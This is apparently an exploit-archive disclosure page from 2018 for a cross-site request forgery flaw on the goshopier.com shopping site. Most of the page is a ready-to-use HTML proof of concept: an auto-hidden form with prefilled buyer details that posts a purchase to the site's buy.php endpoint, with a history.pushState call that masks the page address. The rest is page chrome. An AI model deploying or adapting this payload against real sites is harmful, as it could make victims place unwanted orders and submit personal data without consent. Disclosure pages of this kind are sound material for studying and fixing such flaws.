Turkey/shopier CSRF Poc in goshopier.com

2018.04.16

90 (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

author:Yusuf Furkan
exploit title;Turkey/shopier CSRF Poc in goshopier.com
twitter:R3DC0D3R1
Hi My name is Yusuf Furkan My csrf Poc in goshopier.com
Poc;
<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.goshopier.com/ShowProduct/buy.php" method="POST">
      <input type="hidden" name="name" value="sdasasa" />
      <input type="hidden" name="surname" value="saasasdsad" />
      <input type="hidden" name="tckn" value="15786352" />
      <input type="hidden" name="address" value="japonya&#32;tokyo" />
      <input type="hidden" name="postcode" value="" />
      <input type="hidden" name="city" value="BalÄ&#177;kesir" />
      <input type="hidden" name="phone" value="&#40;555&#41;&#32;555&#32;&#45;&#32;52552115" />
      <input type="hidden" name="email" value="testcsrf&#64;gmail&#46;com" />
      <input type="hidden" name="note" value="" />
      <input type="hidden" name="productid" value="52971" />
      <input type="hidden" name="productcount" value="1" />
      <input type="hidden" name="opt1" value="" />
      <input type="hidden" name="opt2" value="" />
      <input type="hidden" name="opt3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Location:Turkey
Note:Burdan Tüm dostlara selamlar :D

References:

Turkey web application Researcher

See this note in RAW Version

Vote for this issue:

66%

34%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Turkey/shopier CSRF Poc in goshopier.com

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Turkey/shopier CSRF Poc in goshopier.com

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.